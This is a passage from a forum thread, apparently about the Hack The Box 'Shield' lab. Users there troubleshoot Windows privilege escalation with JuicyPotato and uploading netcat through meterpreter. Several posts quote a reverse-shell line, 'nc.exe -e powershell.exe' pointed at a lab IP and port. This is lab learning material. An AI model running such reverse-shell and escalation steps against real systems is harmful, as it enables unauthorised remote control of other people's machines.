Starting Point: Shield, JuicyPotato and netcat

@R4ZZB33RY said:

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

your .bat file is not correct

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

@VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

@R4ZZB33RY said:

@VbScrub said:

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

Great :smiley:

guys, I don’t get how to download juicypotato. If I go to the GitHub page and I download it, there is no file called JuicyPotato.exe. Where is it??

Here you go: Releases · ohpe/juicy-potato · GitHub

@tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

@Jade86 said:

@tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

@tasidonya said:

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

ok I’ll do that. Just to be absolutely sure, you just clicked on the file and it downloaded, yeah?

@Jade86 yes.

@R4ZZB33RY said:

@Jade86 said:

@tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

thank you, but when I download the .exe file, it’s empty??

it gets flagged by your operating system. You have to open the file

Ah I see! Ok, I feel a bit dumb here, but after I open the file, how do I save it in some folder on my machine? I’m very new to linux…

nevermind, done it. Thank you guys!!

What am I doing wrong?!

@misentomanuel said:

What am I doing wrong?!
https://imgur.com/zLfx2Zh.png

ok so I’m not an expert but it seems that there is no file called nc.exe in your local /home/kali/Desktop folder, so when you try to upload it to the box it tells you so. Then, obviously when you try and execute it, you can’t because the file is not there.
The reason why you do see a file called nc.exe in the remote uploads folder is probably cause someone else is doing the same box and they uploaded it successfully. The other thing, when you execute nc.exe, you need to change the ip address to YOUR own ip address, so that 10.10.14.2 needs to be changed, otherwise you are basically contacting another machine that isn’t yours. Also when you do lcd /home/username/downloads, that again is a fictitious folder that the guy who wrote the walkthrough created, but you need to substitute the path to your local folder that contains the exploits to that fictitious folder. Start by changing these things, and see how it goes.

@Jade86 said:

@misentomanuel said:

What am I doing wrong?!
https://imgur.com/zLfx2Zh.png

ok so I’m not an expert but it seems that there is no file called nc.exe in your local /home/kali/Desktop folder, so when you try to upload it to the box it tells you so. Then, obviously when you try and execute it, you can’t because the file is not there.
The reason why you do see a file called nc.exe in the remote uploads folder is probably cause someone else is doing the same box and they uploaded it successfully. The other thing, when you execute nc.exe, you need to change the ip address to YOUR own ip address, so that 10.10.14.2 needs to be changed, otherwise you are basically contacting another machine that isn’t yours. Also when you do lcd /home/username/downloads, that again is a fictitious folder that the guy who wrote the walkthrough created, but you need to substitute the path to your local folder that contains the exploits to that fictitious folder. Start by changing these things, and see how it goes.

Thanks for the reply. https://imgur.com/z0NzLq6.png idk :frowning:
username is my dir on my kali right? home/kali/Downloads is my dir

@misentomanuel said:

@Jade86 said:

(Quote)
Thanks for the reply. https://imgur.com/z0NzLq6.png idk :frowning:
username is my dir on my kali right? home/kali/Downloads is my dir

Ok, open another terminal and type “find -name nc.exe”, and see what it gives you. Then do the same with juicypotato.exe and see what it gives you. The result of these two operations should give you the exact path where you have the two files on your machine.

@Jade86 said:

@misentomanuel said:

@Jade86 said:

(Quote)
Thanks for the reply. https://imgur.com/z0NzLq6.png idk :frowning:
username is my dir on my kali right? home/kali/Downloads is my dir

Ok, open another terminal and type “find -name nc.exe”, and see what it gives you. Then do the same with juicypotato.exe and see what it gives you. The result of these two operations should give you the exact path where you have the two files on your machine.

I gave that command both on the terminal of my kali and inside meterpreter. Find nothing :frowning:

@misentomanuel said:

I gave that command both on the terminal of my kali and inside meterpreter. Find nothing :frowning:

Ok, that means that you don’t have the two exploits downloaded on your computer. What the walkthrough doesn’t tell you is that you have to download both nc.exe and JuicyPotato.exe on your machine first, and THEN upload them to the target machine. You can find both of them on github.